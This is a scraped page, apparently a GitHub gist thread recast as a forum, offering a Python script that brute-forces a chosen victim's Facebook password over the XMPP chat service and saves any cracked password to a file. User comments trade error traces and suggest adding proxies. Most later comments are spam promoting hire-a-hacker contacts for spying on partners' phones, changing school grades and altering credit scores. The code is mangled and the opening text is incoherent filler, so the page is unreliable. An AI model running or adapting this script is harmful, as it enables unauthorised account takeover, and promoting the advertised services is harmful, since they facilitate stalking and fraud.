Facebreak Facebook Brute Force Program Forum

 admin  
This simple script to penetrate accounts Facebook brute-force
  1. Facebreak Facebook Brute Force Program Forums

There aren't that many tours of the four-by-four board, so it's easy to check this by brute force with a simple program; in fact there are six according to. Imagine 1 collection on a stylish forum drive inveterately cotton on to a leave 1000 or so views, with announce ' 100 of those people visiting your site.

Facebook-brute-force.py
#!/usr/bin/python
#Install SleekXMPP & xmpppy Modules
#This program is not for children -(18)
#This program is only for educational purposes only.
#Don't Attack people facebook account's it's illegal !
#If you want to HaCk into someone's account, you must have the permission of the user.
#usage:Facebook-brute-force.py [wordlist file]
#Coded By Hossam Youssef <hossam.mox@gmail.com> ^_^
import xmpp
import sys
import urllib,re
import time
import random
import datetime
definternet_on():
try :
data = urllib.urlopen('https://www.google.com')
returnTrue
except :
returnFalse
if internet_on() True:
print''
t _____ _____ _____ _
t ___ ___ / __
t _ _/ / ______ / / _ __ __ _ ___ __ ___ _ __
t _ ___ ______ '__ / _` / __ / / / _ '__
t _/ / __/ (_ (__ < __/
t_ ____/ ____/ _ __,_ ___ _ _ ___ _
# Private Ghost Password ^_^
# Coded By Hossam Youssef :)
# Enjoy Cracking ^_^
# usage: Facebook-brute-force.py [wordlist file]
''
login =raw_input('Enter username of victim account : ')
password_list =open(sys.argv[1],'r')
_login=login+'@chat.facebook.com'
print'[+]Connecting To Facebook Terminal Server... '
print'[+]Connection Has Been Establishing Successfully To The Server...'
print'[+]Negotiating With The Protocol...'
print'[+]There was no error with Port...'
print'[+]You Are Successfully Connected Enj0y...'
print'[+]Attack Has Been Started Be Patient...'
for pwd in password_list:
sys.stdout.write('.')
sys.stdout.flush()
pwd=pwd.strip('n')
jid = xmpp.protocol.JID(_login)
cl = xmpp.Client(jid.getDomain(), debug=[])
if cl.connect(('chat.facebook.com',5222)):
print'!~Injecting Password~!'
else:
print'[+]Successed[+]'
print'[!]',pwd
if cl.auth(jid.getNode(), pwd):
cl.sendInitPresence()
print'[+] -> The Account Has Been Cracked ^__^ ',' Password Found > : ',pwd
file=open(login+'.txt', 'w')
file.write('Email : '+login+'@facebook.comn')
file.write('Password : '+pwd+'n')
file.write(str(datetime.datetime.now()))
file.close()
break
cl.disconnect()
time.sleep(2)
else:
print'You have a problem to connect to the Internet :('

commented Oct 23, 2015

[+]Connecting To Facebook Terminal Server...
[+]Connection Has Been Establishing Successfully To The Server...
[+]Negotiating With The Protocol...
[+]There was no error with Port...
[+]You Are Successfully Connected Enj0y...
[+]Attack Has Been Started Be Patient...
.Traceback (most recent call last):
File 'C:UsersabdoDesktopFacebook-brute-force.py', line 114, in
if cl.connect(('chat.facebook.com',5222)):
File 'C:Python27libsite-packagesxmppclient.py', line 205, in connect
while not self.TLS.starttls and self.Process(1): pass
File 'C:Python27libsite-packagesxmppdispatcher.py', line 303, in dispatch
handler'func'
File 'C:Python27libsite-packagesxmpptransports.py', line 337, in StartTLSHandler
self._startSSL()
File 'C:Python27libsite-packagesxmpptransports.py', line 316, in _startSSL
tcpsock._sslIssuer = tcpsock._sslObj.issuer()
AttributeError: '_ssl._SSLSocket' object has no attribute 'issuer'

fix just install patched xmpppy frome here : https://github.com/ArchipelProject/xmpppy

Program

commented Nov 4, 2015

Traceback (most recent call last):
File 'Facebook-brute-force.py', line 60, in
sys.stdout = WTCW(sys.stdout)
File 'Facebook-brute-force.py', line 33, in init
self.handle = ctypes.windll.kernel32.GetStdHandle(self.STD_OUTPUT_HANDLE)
AttributeError: 'module' object has no attribute 'windll'
Exception AttributeError: 'module' object has no attribute 'windll' in <bound method WTCW.del of <open file ', mode 'w' at 0x7f4170bf4150>> ignored

Tried running on linux

commented Nov 30, 2015

Same problem FistMeNaruto is having.

Traceback (most recent call last):
File 'facebook-brute-force.py', line 60, in
sys.stdout = WTCW(sys.stdout)
File 'facebook-brute-force.py', line 33, in init
self.handle = ctypes.windll.kernel32.GetStdHandle(self.STD_OUTPUT_HANDLE)
AttributeError: 'module' object has no attribute 'windll'
Exception AttributeError: 'module' object has no attribute 'windll' in <bound method WTCW.del of <open file ', mode 'w' at 0x7fc316d6c150>> ignored

commented Dec 1, 2015

Not working, no response.

commented Jan 12, 2016

Enter username of victim account : (xxxxxxxxxxxxxxxxxxxxx)
Traceback (most recent call last):
File './Facebook-brute-force.py', line 47, in
password_list = open(sys.argv[1],'r')
IndexError: list index out of range

commented Jan 17, 2016

I am having this issue
.Traceback (most recent call last):
File 'facebook-cracker.py', line 68, in
if cl.connect(('chat.facebook.com',5222)):
File 'build/bdist.linux-i686/egg/xmpp/client.py', line 205, in connect
File 'build/bdist.linux-i686/egg/xmpp/dispatcher.py', line 303, in dispatch
File 'build/bdist.linux-i686/egg/xmpp/transports.py', line 337, in StartTLSHandler
File 'build/bdist.linux-i686/egg/xmpp/transports.py', line 316, in _startSSL
AttributeError: '_ssl._SSLSocket' object has no attribute 'issuer'

commented Jan 31, 2016

Won't facebook.com automatically lock you out after a few failed attempts, though?

commented Mar 11, 2016

what username should I use? I tried everything, but no hope

commented Mar 13, 2016

not working.... I try my Facebook accuton with username, email and phone...

commented Mar 26, 2016

I have changed this password_list = open(sys.argv[1],'r') to this password_list = open(sys.argv[0],'r')
which now the script has started working but i have ran into another problem
i started the script like Facebook-brute-force.py [wordlist file] then i entered my username
and the script isnt using from my password list
as you can see where it should be a password to try its ' [!] #!/usr/bin/python ' instead
[+]Attack Has Been Started Be Patient...
.!Injecting Password!
[!] #!/usr/bin/python

any ideas?

commented Mar 26, 2016

HossamYousef where is WTCW in the script ? cant find it to remove it ?

commented Jun 27, 2016

I have problem when I put the username

Traceback (most recent call last):
File 'Facebook-brute-force.py', line 47, in
password_list = open(sys.argv[1],'r')
IndexError: list index out of range

commented Jul 1, 2016

Traceback (most recent call last):
File 'Facebook-brute-force.py', line 47, in
password_list = open(sys.argv[1],'r')
IndexError: list index out of range

Not WOrking Try Again Hossam

commented Sep 30, 2016

Thank you for this nice example, not quiet perfect but it shows how it is done! I don't quiet understand the sleep(2) since it slows down the attack a lot. Is this necessary for some reason or just to test purposes?

commented Oct 23, 2016

Injecting the pw is nice but unfortunately this script won't actually detect if it's a correct pw. You can try it with valid credentials and see.

commented Nov 21, 2016

Facebreak Facebook Brute Force Program Forums

same Problem as sykal can't detect if the pw is correct he just take the next one

commented Jan 10, 2017

u need to put the word list with the username as system argv

commented Feb 1, 2017

mmhh can you give me the lines im new with python comming from java&c++
do you mean this lines?
email = str(raw_input('# Enter Email Phone number Profile ID number Username : '))
passwordlist = str(raw_input('Enter the name of the password list file : '))

commented Feb 11, 2017

How to use this can anyone tell me please

commented Mar 5, 2017

This might help you -> https://developers.facebook.com/docs/chat . The api closed.

commented Apr 17, 2017

my python script is running successfully but it cant found password even my wordlist contain my password ...plz tell me what to do

commented May 12, 2017

What a command for this script after succes?

commented May 13, 2017

why that happen

python faceBrute.py
Traceback (most recent call last):
File 'faceBrute.py', line 11, in
import xmpp
ImportError: No module named xmpp

commented May 20, 2017

Traceback (most recent call last):
File 'Facebook-brute-force.py', line 69, in
if cl.auth(jid.getNode(), pwd):
File '/usr/lib/python2.7/dist-packages/xmpp/client.py', line 225, in auth
while self.SASL.startsasl'in-process' and self.Process(1): pass
File '/usr/lib/python2.7/dist-packages/xmpp/dispatcher.py', line 303, in dispatch
handler'func'
File '/usr/lib/python2.7/dist-packages/xmpp/dispatcher.py', line 215, in streamErrorHandler
raise exc((name,text))
xmpp.protocol.InternalServerError: (u'internal-server-error', ')

commented Jun 19, 2017

script whenever i run says 'you have a problem connecting to the internet' even though my internet is working fine. any solutions?

commented Aug 25, 2017

it dosent work

commented Dec 3, 2017

would be nice if you added SOCK5 Proxy to it, by doing 'import tor' and 'import socks'

commented Dec 24, 2017

I made a better version of Facebook/Twitter/Instagram Bruteforce script, come check it out.
https://github.com/Juniorn1003/Faitagram

commented Jan 21, 2018

can you teach me guys on how to run this script thanks

commented Jun 1, 2018

Traceback (most recent call last):
File 'C:Usersuser1DownloadsBruteForceFacebook-brute-force.py', line 77, in
if cl.auth(jid.getNode(), pwd):
File 'C:Python27ArcGIS10.2libsite-packagesxmppclient.py', line 209, in auth
while not self.Dispatcher.Stream._document_attrs and self.Process(1): pass
AttributeError: Client instance has no attribute 'Dispatcher'

commented Jul 23, 2018

How to i install ( xmpp) ?

commented Sep 27, 2018

commented Oct 22, 2018

I have got the same problem like @HarflyZone .

commented Jul 9, 2019

Say no to fake hackers my pals I got a very trustworthy hacker. I have tried him and he delivered to me 100% trusted. You need his contact details? (JEAJAMHACKER@GMAIL.COM) Tell him Dana Krum referred you

commented Jul 10, 2019

Getting a hacker to work for you is never a bad idea……… I hired DARKHATTHACKER@GMAIL.COM to help me in going through my husband phone to know if he is cheating on me. When I contacted this hacker he was very fast in replying to my email and also fast in gaining access to my husband phone without physical access and under 4 hours I read a lot from my husband text messages and deleted text messages, My husband ex has been telling my husband to take a divorce with me. That means my husband is still having an affair with his EX. But I guess am smart I got alot from his text messages and deleted text messages. Thank you DARKHATT YOU ARE THE BEST.

commented Jul 11, 2019

I was at the point of repeating a particular class because I had a very bad grade. But it got easy some how because of my friend told me about RUSSIANCYBERHACKERS@GMAIL.COM so I contacted this hacker and Told him what I wanted. Though he told me what is required and I did all of that in 3 hours. This hacker asked me to check my school link and I did behold it was changed from cs to As. So am here to thank this hacker. Am really grateful RUSSIANCYBERHACKERS

commented Jul 12, 2019

My woman was thinking I can’t be happy without her. Though I caught her 3 days ago cheating on me with the help of SPYEXPERT0@GMAIL.COM I read her text messages, I listened to her phone calls been recorded right on my phone. Whatsapp and many more I saw a lot of bad reputations about my wife. I swear with my life am happy I came in contact with this hacker called SPYEXPERT0@GMAIL.COM I showed her parent proof of there daughter cheating on me and all. It was to bad that I can’t even forgive her but to take a divorce with her and now am happy with the only person that gives me joy which is my son. Thanks to a great HACKER. I will always look up to you the SPYEXPERT0

commented Jul 14, 2019

A friend of mine recommended this hacker fredvalcyberghost @ gmail. com,Thank God i listen It’s better you work with the right people, thanks to the most reliable hackers so far. Contact him now....am sure you will come back and thank me later and pls tell him who refer you to him and you can also contact him on watsap +19373884469..and You can text or call him on +19492875119 ..👨‍💻👨‍💻👨‍💻

commented Jul 14, 2019

After much failed attempts to spy on my spouse whom I suspected has been cheating on me, thankfully I got a recommended Fred which I contacted his so reliable, he work with discretion and deliver in a bit he do all sort of hackings (unrestricted and unnoticeable access to my partner's phone and PC activities ) I would prefer to let his services speak for itself you can contact on this email fredvalcyberghost@gmail.com and on watsap +19373884469 and you can also text or call him on +19492875119

commented Jul 15, 2019

JEAJAMHACKER@GMAIL.COM ALL THE WAY!!!!!! HIS HACKING TOOLS IN BREAKING INTO PHONES ARE VERY GOOD. WITHOUT YOUR SPOUSE KNOWING ABOUT THE HACK. THANKS FOR HELPING ME JEAJAMHACKER.

commented Jul 16, 2019

I found out that each time I leave the office some one goes to my computer and take some of my personal document. I don’t know how the person manage to break through my computer.so I had to find solutions to know who has been doing this then I went online and searched for hackers who can do this for me and I saw DARKHATTHACKER@GMAIL.COM as one of the top best hackers so I contacted him and told him about my problem and how I need solutions. This hacker used a very mad and reliable tools as he told me and I saw it. This tools were able to clone over 10 computers that we use in my office and I found out the person doing this in less than 4 hours DARKHATTHACKER I promised I was going to give you good reviews if this works. Here I am keeping to my promise God bless you and just know you are the best. Now I feel very secured.

commented Jul 20, 2019

As for me DARKHATTHACKER@GMAIL.COM is the best world wide. Well am a big fan of this hacker and I have also used his services more than 4 times and it all came out successful.

commented Jul 21, 2019

I am here to say thanks to RUSSIANCYBERHACKERS@GMAIL.COM for helping me in hacking a DOMAIN EMAIL account which contains so many documents. I would have gotten a sack letter just because I lots the DOMAIN EMAIL account. But thank God I met this hacker who helped me regained it in less than 3 hours. Now am free and I have rest of mind now.

commented Jul 22, 2019

I swear with my life. HACKERS are real I have tested JEAJAMHACKER@GMAIL.COM in hacking my wife instagram account. Under the space of 1 hour I got her passcode to her instagram account and no matter how she changes her pass code it will be updated from my end for a year.

commented Jul 23, 2019

SPYEXPERT0@GMAIL.COM is really an expert at hacking. This hacker breaks into any site, breaks into logs, clone phones and so on. mehn I used this hacker today and I was loyal. Cause I have contacted like 2 hackers before I met SPY-EXPERT and they didn’t deliver like this hacker did. Well I must say never stop trying. I was about loosing hope and trust but I decided to try one more time before I give up on cloning my spouse phone and here we are. Am Really happy at SPY-EXPERT this hacker cloned my spouse phone without any notice of my spouse. more

Facebreak facebook brute force program forums

commented Jul 24, 2019

My name is Logan Cooper and am a verified seller and dealer IN ALIBABA company. Some buyers sent me some link. I was thinking it’s gonna be the product of what they wanted to buy. Little did I know that it was all this spammers looking for emails and site to clone. But the good thing is that they never knew I have paid for a program with the help of DARKHATTHACKER@GMAIL.COM my laptop and all the computer users in our company (ALIBABA) are protected. once those links come up it will reflect to us as virus. And automatically clear it off that means we are safe with this hacker. On behalf of ALIBABA we are saying a very big thank you to DARKHATTHACKER@GMAIL.COM.

commented Jul 24, 2019

My name is Logan Cooper and am a verified seller and dealer IN ALIBABA company. Some buyers sent me some link. I was thinking it’s gonna be the product of what they wanted to buy. Little did I know that it was all this spammers looking for emails and site to clone. But the good thing is that they never knew I have paid for a program with the help of DARKHATTHACKER@GMAIL.COM my laptop and all the computer users in our company (ALIBABA) are protected. once those links come up it will reflect to us as virus. And automatically clear it off that means we are safe with this hacker. On behalf of ALIBABA we are saying a very big thank you to DARKHATTHACKER@GMAIL.COM.

commented Jul 25, 2019

Never give a man 100% of your heart, body and soul. Men are all cheats. if you feel am lying contact RUSSIANCYBERHACKERS@GMAIL.COM he has solutions when it comes to cloning of phones. And once he clones your spouse phone you will have direct access to your spouse phone right on your phone. RUSSIANCYBERHACKERS@GMAIL.COM is the best I confirmed by using his services and I found out that my boyfriend is a Devil. Thanks RUSSIANCYBERHACKERS

commented Jul 29, 2019

When I come on here to appreciate a hacker. I do this because of the good work this hacker has done for me. This is not just a write up or anything This hacker has been good to me and also saved my relationship from crashing……. Thank you JEAJAMHACKER@GMAIL.COM I will always advice people to use your services cause you are good at your job, fast and smart.

commented Jul 30, 2019

I emailed SPYEXPERT0@GMAIL.COM in other to hack my boyfriend iPhone, cause presently his in AUSTRALIA and am in UK though he travelled since last month and he has not been calling me like before and also his phone sometimes says switched off. Am sure he blocked me from his whatsapp cause I don’t see his whatsapp status any more, I know my boyfriend posts a lot and now I can’t see anything… that was why I emailed SPYEXPERT0@GMAIL.COM In other to know what has been going on, in less than 4 hours this hacker gave me full access to my boyfriend phone, now I have confirmed that he blocked me on whatsapp cause I can go through his iPhone right on my phone. And I saw it that my boyfriend is moving with another lady. Don’t be deceived by people who says hackers are not real, don’t mind them. Its really working for me and my friends though I was directed to this hacker and his job was 100% true.

commented Jul 30, 2019

DARKHATTHACKER@GMAIL.COM you are really the best saw the jobs you sent for me. Well I don’t need to stress about catching my spouse cheating anymore all I do is to email this hacker and I will have all my spouse whatsapp, text messages, deleted text messages, call logs, facebook and many more right on my phone for 1 year tracking. DARKHATTHACKER we all love you.

commented Jul 31, 2019

I am Maria Anderson McCrackin and so far have been having a very big challenges In fixing my poor credit score. It got me all walked up but after a long search I saw where so many people recommended RUSSIANCYBERHACKERS@GMAIL.COM as the best in fixing poor scores and I emailed them for help after some few conversations with them we proceeded and in 2hours I was asked to check my score and i checked my credit score and it was upgraded from the poor 1 to a very excellent score. Am here to give glory to the RUSSIANCYBERHACKERS you guys did a great work for me. And all of this were done at an affordable price. Thanks

commented Jul 31, 2019

I have been looking at a lot of write ups about hackers online, and have seen a lot and no one has really said anything about this guy Spyexpert0@gmail.com this hacker is really good, he is very fast and reliable he tries to get a good understanding of what you want before running a hack for you, I will advice you contact Spyexpert0@gmail.com if you are going through a divorce or you suspect your partner is cheating.

commented Aug 1, 2019

Hello everyone, I have tried Jeajamhacker@gmail.com and i have confirmed his good work among all of this hackers out there ,he helped me hack my cheating partner whatsapp, facebook and cell phone number. I listened to all her calls and I was able to get good evidence for my attorney for divorce. It was really a big surprise to me but glad I gave a try. Contact him for similar issues on Jeajamhacker@gmail.com and consider your big problem solved.

commented Aug 2, 2019

darkhatthacker@gmail.com is the kind of hacker I have been looking for…. Best in all. I have used his services like 3-4 times and it was a hit. Thanks to darkhatthacker

commented Aug 3, 2019

I was heart broken today after reading my husband text messages with the help of russiancyberhackers@gmail.com. Never trust a man or a woman that does not allow you touch his or her phone. If you notice this just contact russiancyberhackers@gmail.com for the same kind of help they rendered to me.

commented Aug 5, 2019

I never knew school grade could be changed until my class mate talked to me about spyexpert0@gmail.com that they help in fixing school grades and that he uses their services almost all the time we write exams. He asked me if I have not wondered why he is always at the top of the class. I then contacted spyexpert0@gmail.com and he delivered to me 100% am so happy I discovered this hacker all I can say now is bye bye to failure LOL!!!!!

commented Aug 6, 2019

i needed a quick hack into my wife whatsapp and I got it done in less than 3hours with the help of darkhatthacker@gmail.com I had all her whatsapp conversations on my phone. Though this is my first time of using darkhatthacker service and it was a success, the best part is that my woman is never going to find out about the hack. I monitor her Whatsapp on my phone without having to touch her cell phone. So am here to say thanks to darkhatthacker@gmail.com more jobs coming your way thanks a lot.

commented Aug 6, 2019

my husband and my best friend have been f***king for a long time now and I never knew…. But this faithful day I hired a hacker that was able to hack both phones and I got access to both phones on my computer I monitored there conversations day and night that was how I found out… russiancyberhackers@gmail.com you guys have made me proud and am so happy, first time using your service was a success. Never trust men and friends.

Sign up for freeto join this conversation on GitHub. Already have an account? Sign in to comment
   Coments are closed